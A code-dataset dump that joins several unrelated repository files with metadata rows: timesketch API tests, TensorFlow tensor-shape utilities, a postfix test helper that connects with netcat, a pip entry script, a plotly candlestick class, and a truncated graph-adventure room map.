u'timestamp_desc': u'Content Modification Time',
u'datetime': u'2014-09-13T07:27:03+00:00'
},
u'_score': u'null',
u'_index': u'test',
u'_id': u'test'
}
]
}
@mock.patch(
'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
def test_search(self):
"""Authenticated request to query the datastore."""
self.login()
response = self.client.get(self.resource_url + '?q=test&filter={}')
self.assertDictEqual(response.json, self.expected_response)
self.assert200(response)
class EventResourceTest(BaseTest):
"""Test EventResource."""
resource_url = '/api/v1/sketches/1/event/'
expected_response = {
u'meta': {
u'comments': []
},
u'objects': {
u'timestamp_desc': u'',
u'timestamp': 1410895419859714,
u'label': u'',
u'source_long': u'',
u'source_short': u'',
u'es_index': u'',
u'es_id': u'',
u'message': u'',
u'datetime': u'2014-09-16T19:23:40+00:00'
}
}
@mock.patch(
'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
def test_get_event(self):
"""Authenticated request to get an event from the datastore."""
self.login()
response = self.client.get(
self.resource_url + '?searchindex_id=test&event_id=test')
self.assertDictEqual(response.json, self.expected_response)
self.assert200(response)
@mock.patch(
'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
def test_invalid_index(self):
"""
Authenticated request to get an event from the datastore, but in the
wrong index.
"""
self.login()
response_400 = self.client.get(
self.resource_url + '?searchindex_id=wrong_index&event_id=test')
self.assert400(response_400)
class EventAnnotationResourceTest(BaseTest):
"""Test EventAnnotationResource."""
resource_url = '/api/v1/sketches/1/event/annotate/'
@mock.patch(
'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
def test_post_annotate_resource(self):
"""Authenticated request to create an annotation."""
self.login()
for annotation_type in ['comment', 'label']:
data = dict(
annotation='test', annotation_type=annotation_type,
event_id='test', searchindex_id='test')
response = self.client.post(
self.resource_url, data=json.dumps(data),
content_type='application/json')
self.assertIsInstance(response.json, dict)
self.assertEquals(response.status_code, HTTP_STATUS_CODE_CREATED)
def test_post_annotate_invalid_index_resource(self):
"""
Authenticated request to create an annotation, but in the wrong index.
"""
self.login()
data = dict(
annotation='test', annotation_type='comment',
event_id='test', searchindex_id='invalid_searchindex')
response = self.client.post(
self.resource_url, data=json.dumps(data),
content_type='application/json')
self.assertEquals(response.status_code, HTTP_STATUS_CODE_BAD_REQUEST)
| [
"jberggren@gmail.com"
] | jberggren@gmail.com |
efb59884fa26538f68333a779cc23eb0241e6598 | 4ce2cff60ddbb9a3b6fc2850187c86f866091b13 | /tfrecords/src/wai/tfrecords/object_detection/utils/shape_utils.py | 8668796fc3a315e45922dc328d7c4ad147799896 | [
"MIT",
"Apache-2.0"
] | permissive | 8176135/tensorflow | 18cb8a0432ab2a0ea5bacd03309e647f39cb9dd0 | 2c3b4b1d66a80537f3e277d75ec1d4b43e894bf1 | refs/heads/master | 2020-11-26T05:00:56.213093 | 2019-12-19T08:13:44 | 2019-12-19T08:13:44 | 228,970,478 | 0 | 0 | null | 2019-12-19T03:51:38 | 2019-12-19T03:51:37 | null | UTF-8 | Python | false | false | 16,848 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils used to manipulate tensor shapes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import zip
import tensorflow as tf
from wai.tfrecords.object_detection.utils import static_shape
get_dim_as_int = static_shape.get_dim_as_int
def _is_tensor(t):
"""Returns a boolean indicating whether the input is a tensor.
Args:
t: the input to be tested.
Returns:
a boolean that indicates whether t is a tensor.
"""
return isinstance(t, (tf.Tensor, tf.SparseTensor, tf.Variable))
def _set_dim_0(t, d0):
"""Sets the 0-th dimension of the input tensor.
Args:
t: the input tensor, assuming the rank is at least 1.
d0: an integer indicating the 0-th dimension of the input tensor.
Returns:
the tensor t with the 0-th dimension set.
"""
t_shape = t.get_shape().as_list()
t_shape[0] = d0
t.set_shape(t_shape)
return t
def pad_tensor(t, length):
"""Pads the input tensor with 0s along the first dimension up to the length.
Args:
t: the input tensor, assuming the rank is at least 1.
length: a tensor of shape [1] or an integer, indicating the first dimension
of the input tensor t after padding, assuming length <= t.shape[0].
Returns:
padded_t: the padded tensor, whose first dimension is length. If the length
is an integer, the first dimension of padded_t is set to length
statically.
"""
t_rank = tf.rank(t)
t_shape = tf.shape(t)
t_d0 = t_shape[0]
pad_d0 = tf.expand_dims(length - t_d0, 0)
pad_shape = tf.cond(
tf.greater(t_rank, 1), lambda: tf.concat([pad_d0, t_shape[1:]], 0),
lambda: tf.expand_dims(length - t_d0, 0))
padded_t = tf.concat([t, tf.zeros(pad_shape, dtype=t.dtype)], 0)
if not _is_tensor(length):
padded_t = _set_dim_0(padded_t, length)
return padded_t
def clip_tensor(t, length):
"""Clips the input tensor along the first dimension up to the length.
Args:
t: the input tensor, assuming the rank is at least 1.
length: a tensor of shape [1] or an integer, indicating the first dimension
of the input tensor t after clipping, assuming length <= t.shape[0].
Returns:
clipped_t: the clipped tensor, whose first dimension is length. If the
length is an integer, the first dimension of clipped_t is set to length
statically.
"""
clipped_t = tf.gather(t, tf.range(length))
if not _is_tensor(length):
clipped_t = _set_dim_0(clipped_t, length)
return clipped_t
def pad_or_clip_tensor(t, length):
"""Pad or clip the input tensor along the first dimension.
Args:
t: the input tensor, assuming the rank is at least 1.
length: a tensor of shape [1] or an integer, indicating the first dimension
of the input tensor t after processing.
Returns:
processed_t: the processed tensor, whose first dimension is length. If the
length is an integer, the first dimension of the processed tensor is set
to length statically.
"""
return pad_or_clip_nd(t, [length] + t.shape.as_list()[1:])
def pad_or_clip_nd(tensor, output_shape):
"""Pad or Clip given tensor to the output shape.
Args:
tensor: Input tensor to pad or clip.
output_shape: A list of integers / scalar tensors (or None for dynamic dim)
representing the size to pad or clip each dimension of the input tensor.
Returns:
Input tensor padded and clipped to the output shape.
"""
tensor_shape = tf.shape(tensor)
clip_size = [
tf.where(tensor_shape[i] - shape > 0, shape, -1)
if shape is not None else -1 for i, shape in enumerate(output_shape)
]
clipped_tensor = tf.slice(
tensor,
begin=tf.zeros(len(clip_size), dtype=tf.int32),
size=clip_size)
# Pad tensor if the shape of clipped tensor is smaller than the expected
# shape.
clipped_tensor_shape = tf.shape(clipped_tensor)
trailing_paddings = [
shape - clipped_tensor_shape[i] if shape is not None else 0
for i, shape in enumerate(output_shape)
]
paddings = tf.stack(
[
tf.zeros(len(trailing_paddings), dtype=tf.int32),
trailing_paddings
],
axis=1)
padded_tensor = tf.pad(clipped_tensor, paddings=paddings)
output_static_shape = [
dim if not isinstance(dim, tf.Tensor) else None for dim in output_shape
]
padded_tensor.set_shape(output_static_shape)
return padded_tensor
def combined_static_and_dynamic_shape(tensor):
"""Returns a list containing static and dynamic values for the dimensions.
Returns a list of static and dynamic values for shape dimensions. This is
useful to preserve static shapes when available in reshape operation.
Args:
tensor: A tensor of any type.
Returns:
A list of size tensor.shape.ndims containing integers or a scalar tensor.
"""
static_tensor_shape = tensor.shape.as_list()
dynamic_tensor_shape = tf.shape(tensor)
combined_shape = []
for index, dim in enumerate(static_tensor_shape):
if dim is not None:
combined_shape.append(dim)
else:
combined_shape.append(dynamic_tensor_shape[index])
return combined_shape
def static_or_dynamic_map_fn(fn, elems, dtype=None,
parallel_iterations=32, back_prop=True):
"""Runs map_fn as a (static) for loop when possible.
This function rewrites the map_fn as an explicit unstack input -> for loop
over function calls -> stack result combination. This allows our graphs to
be acyclic when the batch size is static.
For comparison, see https://www.tensorflow.org/api_docs/python/tf/map_fn.
Note that `static_or_dynamic_map_fn` currently is not *fully* interchangeable
with the default tf.map_fn function as it does not accept nested inputs (only
Tensors or lists of Tensors). Likewise, the output of `fn` can only be a
Tensor or list of Tensors.
TODO(jonathanhuang): make this function fully interchangeable with tf.map_fn.
Args:
fn: The callable to be performed. It accepts one argument, which will have
the same structure as elems. Its output must have the
same structure as elems.
elems: A tensor or list of tensors, each of which will
be unpacked along their first dimension. The sequence of the
resulting slices will be applied to fn.
dtype: (optional) The output type(s) of fn. If fn returns a structure of
Tensors differing from the structure of elems, then dtype is not optional
and must have the same structure as the output of fn.
parallel_iterations: (optional) number of batch items to process in
parallel. This flag is only used if the native tf.map_fn is used
and defaults to 32 instead of 10 (unlike the standard tf.map_fn default).
back_prop: (optional) True enables support for back propagation.
This flag is only used if the native tf.map_fn is used.
Returns:
A tensor or sequence of tensors. Each tensor packs the
results of applying fn to tensors unpacked from elems along the first
dimension, from first to last.
Raises:
ValueError: if `elems` a Tensor or a list of Tensors.
ValueError: if `fn` does not return a Tensor or list of Tensors
"""
if isinstance(elems, list):
for elem in elems:
if not isinstance(elem, tf.Tensor):
raise ValueError('`elems` must be a Tensor or list of Tensors.')
elem_shapes = [elem.shape.as_list() for elem in elems]
# Fall back on tf.map_fn if shapes of each entry of `elems` are None or fail
# to all be the same size along the batch dimension.
for elem_shape in elem_shapes:
if (not elem_shape or not elem_shape[0]
or elem_shape[0] != elem_shapes[0][0]):
return tf.map_fn(fn, elems, dtype, parallel_iterations, back_prop)
arg_tuples = zip(*[tf.unstack(elem) for elem in elems])
outputs = [fn(arg_tuple) for arg_tuple in arg_tuples]
else:
if not isinstance(elems, tf.Tensor):
raise ValueError('`elems` must be a Tensor or list of Tensors.')
elems_shape = elems.shape.as_list()
if not elems_shape or not elems_shape[0]:
return tf.map_fn(fn, elems, dtype, parallel_iterations, back_prop)
outputs = [fn(arg) for arg in tf.unstack(elems)]
# Stack `outputs`, which is a list of Tensors or list of lists of Tensors
if all([isinstance(output, tf.Tensor) for output in outputs]):
return tf.stack(outputs)
else:
if all([isinstance(output, list) for output in outputs]):
if all([all(
[isinstance(entry, tf.Tensor) for entry in output_list])
for output_list in outputs]):
return [tf.stack(output_tuple) for output_tuple in zip(*outputs)]
raise ValueError('`fn` should return a Tensor or a list of Tensors.')
def check_min_image_dim(min_dim, image_tensor):
"""Checks that the image width/height are greater than some number.
This function is used to check that the width and height of an image are above
a certain value. If the image shape is static, this function will perform the
check at graph construction time. Otherwise, if the image shape varies, an
Assertion control dependency will be added to the graph.
Args:
min_dim: The minimum number of pixels along the width and height of the
image.
image_tensor: The image tensor to check size for.
Returns:
If `image_tensor` has dynamic size, return `image_tensor` with a Assert
control dependency. Otherwise returns image_tensor.
Raises:
ValueError: if `image_tensor`'s' width or height is smaller than `min_dim`.
"""
image_shape = image_tensor.get_shape()
image_height = static_shape.get_height(image_shape)
image_width = static_shape.get_width(image_shape)
if image_height is None or image_width is None:
shape_assert = tf.Assert(
tf.logical_and(tf.greater_equal(tf.shape(image_tensor)[1], min_dim),
tf.greater_equal(tf.shape(image_tensor)[2], min_dim)),
['image size must be >= {} in both height and width.'.format(min_dim)])
with tf.control_dependencies([shape_assert]):
return tf.identity(image_tensor)
if image_height < min_dim or image_width < min_dim:
raise ValueError(
'image size must be >= %d in both height and width; image dim = %d,%d' %
(min_dim, image_height, image_width))
return image_tensor
def assert_shape_equal(shape_a, shape_b):
"""Asserts that shape_a and shape_b are equal.
If the shapes are static, raises a ValueError when the shapes
mismatch.
If the shapes are dynamic, raises a tf InvalidArgumentError when the shapes
mismatch.
Args:
shape_a: a list containing shape of the first tensor.
shape_b: a list containing shape of the second tensor.
Returns:
Either a tf.no_op() when shapes are all static and a tf.assert_equal() op
when the shapes are dynamic.
Raises:
ValueError: When shapes are both static and unequal.
"""
if (all(isinstance(dim, int) for dim in shape_a) and
all(isinstance(dim, int) for dim in shape_b)):
if shape_a != shape_b:
raise ValueError('Unequal shapes {}, {}'.format(shape_a, shape_b))
else: return tf.no_op()
else:
return tf.assert_equal(shape_a, shape_b)
def assert_shape_equal_along_first_dimension(shape_a, shape_b):
"""Asserts that shape_a and shape_b are the same along the 0th-dimension.
If the shapes are static, raises a ValueError when the shapes
mismatch.
If the shapes are dynamic, raises a tf InvalidArgumentError when the shapes
mismatch.
Args:
shape_a: a list containing shape of the first tensor.
shape_b: a list containing shape of the second tensor.
Returns:
Either a tf.no_op() when shapes are all static and a tf.assert_equal() op
when the shapes are dynamic.
Raises:
ValueError: When shapes are both static and unequal.
"""
if isinstance(shape_a[0], int) and isinstance(shape_b[0], int):
if shape_a[0] != shape_b[0]:
raise ValueError('Unequal first dimension {}, {}'.format(
shape_a[0], shape_b[0]))
else: return tf.no_op()
else:
return tf.assert_equal(shape_a[0], shape_b[0])
def assert_box_normalized(boxes, maximum_normalized_coordinate=1.1):
"""Asserts the input box tensor is normalized.
Args:
boxes: a tensor of shape [N, 4] where N is the number of boxes.
maximum_normalized_coordinate: Maximum coordinate value to be considered
as normalized, default to 1.1.
Returns:
a tf.Assert op which fails when the input box tensor is not normalized.
Raises:
ValueError: When the input box tensor is not normalized.
"""
box_minimum = tf.reduce_min(boxes)
box_maximum = tf.reduce_max(boxes)
return tf.Assert(
tf.logical_and(
tf.less_equal(box_maximum, maximum_normalized_coordinate),
tf.greater_equal(box_minimum, 0)),
[boxes])
def flatten_dimensions(inputs, first, last):
"""Flattens `K-d` tensor along [first, last) dimensions.
Converts `inputs` with shape [D0, D1, ..., D(K-1)] into a tensor of shape
[D0, D1, ..., D(first) * D(first+1) * ... * D(last-1), D(last), ..., D(K-1)].
Example:
`inputs` is a tensor with initial shape [10, 5, 20, 20, 3].
new_tensor = flatten_dimensions(inputs, last=4, first=2)
new_tensor.shape -> [10, 100, 20, 3].
Args:
inputs: a tensor with shape [D0, D1, ..., D(K-1)].
first: first value for the range of dimensions to flatten.
last: last value for the range of dimensions to flatten. Note that the last
dimension itself is excluded.
Returns:
a tensor with shape
[D0, D1, ..., D(first) * D(first + 1) * ... * D(last - 1), D(last), ...,
D(K-1)].
Raises:
ValueError: if first and last arguments are incorrect.
"""
if first >= inputs.shape.ndims or last > inputs.shape.ndims:
raise ValueError('`first` and `last` must be less than inputs.shape.ndims. '
'found {} and {} respectively while ndims is {}'.format(
first, last, inputs.shape.ndims))
shape = combined_static_and_dynamic_shape(inputs)
flattened_dim_prod = tf.reduce_prod(shape[first:last],
keepdims=True)
new_shape = tf.concat([shape[:first], flattened_dim_prod,
shape[last:]], axis=0)
return tf.reshape(inputs, new_shape)
def flatten_first_n_dimensions(inputs, n):
"""Flattens `K-d` tensor along first n dimension to be a `(K-n+1)-d` tensor.
Converts `inputs` with shape [D0, D1, ..., D(K-1)] into a tensor of shape
[D0 * D1 * ... * D(n-1), D(n), ... D(K-1)].
Example:
`inputs` is a tensor with initial shape [10, 5, 20, 20, 3].
new_tensor = flatten_first_n_dimensions(inputs, 2)
new_tensor.shape -> [50, 20, 20, 3].
Args:
inputs: a tensor with shape [D0, D1, ..., D(K-1)].
n: The number of dimensions to flatten.
Returns:
a tensor with shape [D0 * D1 * ... * D(n-1), D(n), ... D(K-1)].
"""
return flatten_dimensions(inputs, first=0, last=n)
def expand_first_dimension(inputs, dims):
"""Expands `K-d` tensor along first dimension to be a `(K+n-1)-d` tensor.
Converts `inputs` with shape [D0, D1, ..., D(K-1)] into a tensor of shape
[dims[0], dims[1], ..., dims[-1], D1, ..., D(k-1)].
Example:
`inputs` is a tensor with shape [50, 20, 20, 3].
new_tensor = expand_first_dimension(inputs, [10, 5]).
new_tensor.shape -> [10, 5, 20, 20, 3].
Args:
inputs: a tensor with shape [D0, D1, ..., D(K-1)].
dims: List with new dimensions to expand first axis into. The length of
`dims` is typically 2 or larger.
Returns:
a tensor with shape [dims[0], dims[1], ..., dims[-1], D1, ..., D(k-1)].
"""
inputs_shape = combined_static_and_dynamic_shape(inputs)
expanded_shape = tf.stack(dims + inputs_shape[1:])
# Verify that it is possible to expand the first axis of inputs.
assert_op = tf.assert_equal(
inputs_shape[0], tf.reduce_prod(tf.stack(dims)),
message=('First dimension of `inputs` cannot be expanded into provided '
'`dims`'))
with tf.control_dependencies([assert_op]):
inputs_reshaped = tf.reshape(inputs, expanded_shape)
return inputs_reshaped
| [
"coreytsterling@gmail.com"
] | coreytsterling@gmail.com |
7092c7986651958a2883bb51380909307aebb640 | 10d89f178dc2e0f594c29c76aeef931c9525fbfd | /tests/.stage3_nonssl/verify_client.d/connector.py | 6629e2ada72684fa53ee0ef3791acf9a5f78acaf | [] | no_license | exphost/exphost.postfix | 7398bc629f02f5d8863535f3752e62a3214d0bb0 | abc770f66422b9bffc6b2223c6356cc846047065 | refs/heads/master | 2023-05-14T08:01:20.293965 | 2021-06-05T07:47:35 | 2021-06-05T08:09:58 | 365,591,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | connector = "nc test.some.example.domain.xyz 25"
def setup_connector(host):
host.ansible(
"command",
"yum install -y nc",
become=True,
check=False,
)
| [
"torgiren@gmail.com"
] | torgiren@gmail.com |
543dd5665279a756c3a9926a77d1086c88ba932d | 379beb6e4ad6f6383615d7eff0bc1b126712cd84 | /venv/bin/pip | 199c858bdc6fa52f707f4580b10a6422e736f50e | [] | no_license | chris-baby/bwonline | 3eb9b372d825eab9cafa39121f254a53ce77298d | cca278a066c0a8beda95db87515ad2ed57d5e43d | refs/heads/master | 2022-08-22T07:52:57.238431 | 2020-05-28T04:31:42 | 2020-05-28T04:31:42 | 267,493,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | #!/Users/tongtong/PycharmProjects/django/bw_online/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"918128078@qq.com"
] | 918128078@qq.com | |
cd3fb7b1c5af5ec78d27e4e22f214c209953131b | 090a4e026addc9e78ed6118f09fd0d7d4d517857 | /graph_objs/candlestick/_decreasing.py | a63b2f5acb3f6c6939a7777ea542936faf4e0bab | [
"MIT"
] | permissive | wwwidonja/new_plotly | 0777365e53ea7d4b661880f1aa7859de19ed9b9a | 1bda35a438539a97c84a3ab3952e95e8848467bd | refs/heads/master | 2023-06-04T19:09:18.993538 | 2021-06-10T18:33:28 | 2021-06-10T18:33:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,701 | py | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Decreasing(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "candlestick"
_path_str = "candlestick.decreasing"
_valid_props = {"fillcolor", "line"}
# fillcolor
# ---------
@property
def fillcolor(self):
"""
Sets the fill color. Defaults to a half-transparent variant of
the line color, marker color, or marker line color, whichever
is available.
The 'fillcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["fillcolor"]
@fillcolor.setter
def fillcolor(self, val):
self["fillcolor"] = val
# line
# ----
@property
def line(self):
"""
The 'line' property is an instance of Line
that may be specified as:
- An instance of :class:`new_plotly.graph_objs.candlestick.decreasing.Line`
- A dict of string/value properties that will be passed
to the Line constructor
Supported dict properties:
color
Sets the color of line bounding the box(es).
width
Sets the width (in px) of line bounding the
box(es).
Returns
-------
new_plotly.graph_objs.candlestick.decreasing.Line
"""
return self["line"]
@line.setter
def line(self, val):
self["line"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
fillcolor
Sets the fill color. Defaults to a half-transparent
variant of the line color, marker color, or marker line
color, whichever is available.
line
:class:`new_plotly.graph_objects.candlestick.decreasing.Lin
e` instance or dict with compatible properties
"""
def __init__(self, arg=None, fillcolor=None, line=None, **kwargs):
"""
Construct a new Decreasing object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`new_plotly.graph_objs.candlestick.Decreasing`
fillcolor
Sets the fill color. Defaults to a half-transparent
variant of the line color, marker color, or marker line
color, whichever is available.
line
:class:`new_plotly.graph_objects.candlestick.decreasing.Lin
e` instance or dict with compatible properties
Returns
-------
Decreasing
"""
super(Decreasing, self).__init__("decreasing")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the new_plotly.graph_objs.candlestick.Decreasing
constructor must be a dict or
an instance of :class:`new_plotly.graph_objs.candlestick.Decreasing`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("fillcolor", None)
_v = fillcolor if fillcolor is not None else _v
if _v is not None:
self["fillcolor"] = _v
_v = arg.pop("line", None)
_v = line if line is not None else _v
if _v is not None:
self["line"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| [
"wwwidonja@gmail.com"
] | wwwidonja@gmail.com |
71a4afa1dc2fd6e0f3aae9e30afd214e671ad0c6 | 5bfd77438d2de22d917bc0b103622a5c59a96377 | /graph_adventure/adv2.py | b584f33e5bb7e72956cf52b9e70f1bc2cf68f85a | [] | no_license | ticotheps/Sprint-Challenge--Graphs | 5cf8b4c3375237869ef962d806db77bc82161837 | 27c31691787572d02d288110e226abef9f44d1b6 | refs/heads/master | 2020-09-29T11:34:56.152170 | 2019-07-21T19:06:10 | 2019-07-21T19:06:10 | 192,962,364 | 0 | 1 | null | 2019-07-21T19:06:11 | 2019-06-20T17:35:16 | Python | UTF-8 | Python | false | false | 29,550 | py | from room import Room
from player import Player
from world import World
import random
# Load world
world = World()
# You may uncomment the smaller graphs for development and testing purposes.
# roomGraph={0: [(3, 5), {'n': 1}], 1: [(3, 6), {'s': 0, 'n': 2}], 2: [(3, 7), {'s': 1}]}
roomGraph={0: [(3, 5), {'n': 1, 's': 5, 'e': 3, 'w': 7}], 1: [(3, 6), {'s': 0, 'n': 2}], 2: [(3, 7), {'s': 1}], 3: [(4, 5), {'w': 0, 'e': 4}], 4: [(5, 5), {'w': 3}], 5: [(3, 4), {'n': 0, 's': 6}], 6: [(3, 3), {'n': 5}], 7: [(2, 5), {'w': 8, 'e': 0}], 8: [(1, 5), {'e': 7}]}
# roomGraph={0: [(3, 5), {'n': 1, 's': 5, 'e': 3, 'w': 7}], 1: [(3, 6), {'s': 0, 'n': 2}], 2: [(3, 7), {'s': 1}], 3: [(4, 5), {'w': 0, 'e': 4}], 4: [(5, 5), {'w': 3}], 5: [(3, 4), {'n': 0, 's': 6}], 6: [(3, 3), {'n': 5, 'w': 11}], 7: [(2, 5), {'w': 8, 'e': 0}], 8: [(1, 5), {'e': 7}], 9: [(1, 4), {'n': 8, 's': 10}], 10: [(1, 3), {'n': 9, 'e': 11}], 11: [(2, 3), {'w': 10, 'e': 6}]}
# roomGraph={0: [(3, 5), {'n': 1, 's': 5, 'e': 3, 'w': 7}], 1: [(3, 6), {'s': 0, 'n': 2, 'e': 12, 'w': 15}], 2: [(3, 7), {'s': 1}], 3: [(4, 5), {'w': 0, 'e': 4}], 4: [(5, 5), {'w': 3}], 5: [(3, 4), {'n': 0, 's': 6}], 6: [(3, 3), {'n': 5, 'w': 11}], 7: [(2, 5), {'w': 8, 'e': 0}], 8: [(1, 5), {'e': 7}], 9: [(1, 4), {'n': 8, 's': 10}], 10: [(1, 3), {'n': 9, 'e': 11}], 11: [(2, 3), {'w': 10, 'e': 6}], 12: [(4, 6), {'w': 1, 'e': 13}], 13: [(5, 6), {'w': 12, 'n': 14}], 14: [(5, 7), {'s': 13}], 15: [(2, 6), {'e': 1, 'w': 16}], 16: [(1, 6), {'n': 17, 'e': 15}], 17: [(1, 7), {'s': 16}]}
# roomGraph={494: [(1, 8), {'e': 457}], 492: [(1, 20), {'e': 400}], 493: [(2, 5), {'e': 478}], 457: [(2, 8), {'e': 355, 'w': 494}], 484: [(2, 9), {'n': 482}], 482: [(2, 10), {'s': 484, 'e': 404}], 486: [(2, 13), {'e': 462}], 479: [(2, 15), {'e': 418}], 465: [(2, 16), {'e': 368}], 414: [(2, 19), {'e': 365}], 400: [(2, 20), {'e': 399, 'w': 492}], 451: [(2, 21), {'e': 429}], 452: [(2, 22), {'e': 428}], 478: [(3, 5), {'e': 413, 'w': 493}], 393: [(3, 6), {'e': 375}], 437: [(3, 7), {'e': 347}], 355: [(3, 8), {'e': 312, 'w': 457}], 433: [(3, 9), {'e': 372}], 404: [(3, 10), {'n': 339, 'w': 482}], 339: [(3, 11), {'s': 404, 'e': 314}], 367: [(3, 12), {'n': 462, 'e': 344}], 462: [(3, 13), {'s': 367, 'w': 486}], 463: [(3, 14), {'e': 458, 'n': 418}], 418: [(3, 15), {'e': 349, 'w': 479}], 368: [(3, 16), {'n': 436, 'e': 284, 'w': 465}], 436: [(3, 17), {'s': 368}], 447: [(3, 18), {'n': 365}], 365: [(3, 19), {'s': 447, 'e': 333, 'w': 414}], 399: [(3, 20), {'e': 358, 'w': 400}], 429: [(3, 21), {'n': 428, 'w': 451}], 428: [(3, 22), {'s': 429, 'e': 411, 'w': 452}], 419: [(4, 4), {'n': 413}], 413: [(4, 5), {'n': 375, 's': 419, 'w': 478}], 375: [(4, 6), {'n': 347, 's': 413, 'w': 393}], 347: [(4, 7), {'n': 312, 's': 375, 'w': 437}], 312: [(4, 8), {'s': 347, 'e': 299, 'w': 355}], 372: [(4, 9), {'e': 263, 'w': 433}], 258: [(4, 10), {'e': 236}], 314: [(4, 11), {'e': 220, 'w': 339}], 344: [(4, 12), {'n': 359, 'e': 230, 'w': 367}], 359: [(4, 13), {'n': 458, 's': 344}], 458: [(4, 14), {'s': 359, 'w': 463}], 349: [(4, 15), {'n': 284, 'w': 418}], 284: [(4, 16), {'n': 470, 's': 349, 'e': 254, 'w': 368}], 470: [(4, 17), {'s': 284}], 301: [(4, 18), {'e': 187}], 333: [(4, 19), {'n': 358, 'e': 303, 'w': 365}], 358: [(4, 20), {'n': 397, 's': 333, 'w': 399}], 397: [(4, 21), {'s': 358}], 411: [(4, 22), {'e': 324, 'w': 428}], 396: [(4, 23), {'e': 391}], 449: [(5, 4), {'n': 432, 'e': 450}], 432: [(5, 5), {'n': 405, 's': 449, 'e': 473}], 405: [(5, 6), {'n': 356, 's': 432}], 356: [(5, 7), {'n': 299, 's': 405}], 299: [(5, 8), {'n': 263, 's': 356, 'w': 312}], 263: [(5, 9), {'n': 236, 's': 299, 'w': 372}], 236: [(5, 10), {'s': 263, 'e': 216, 'w': 258}], 220: [(5, 11), {'n': 230, 'e': 215, 'w': 314}], 230: [(5, 12), {'s': 220, 'w': 344}], 266: [(5, 13), {'n': 379, 'e': 260}], 379: [(5, 14), {'s': 266}], 274: [(5, 15), {'e': 222}], 254: [(5, 16), {'e': 205, 'w': 284}], 227: [(5, 17), {'e': 194}], 187: [(5, 18), {'n': 303, 'e': 167, 'w': 301}], 303: [(5, 19), {'n': 352, 's': 187, 'w': 333}], 352: [(5, 20), {'s': 303}], 357: [(5, 21), {'e': 342}], 324: [(5, 22), {'n': 391, 'e': 289, 'w': 411}], 391: [(5, 23), {'n': 489, 's': 324, 'w': 396}], 489: [(5, 24), {'n': 491, 's': 391}], 491: [(5, 25), {'s': 489}], 450: [(6, 4), {'w': 449}], 473: [(6, 5), {'w': 432}], 423: [(6, 6), {'e': 395}], 469: [(6, 7), {'e': 362}], 310: [(6, 8), {'n': 271}], 271: [(6, 9), {'s': 310, 'e': 217}], 216: [(6, 10), {'e': 213, 'w': 236}], 215: [(6, 11), {'n': 243, 'e': 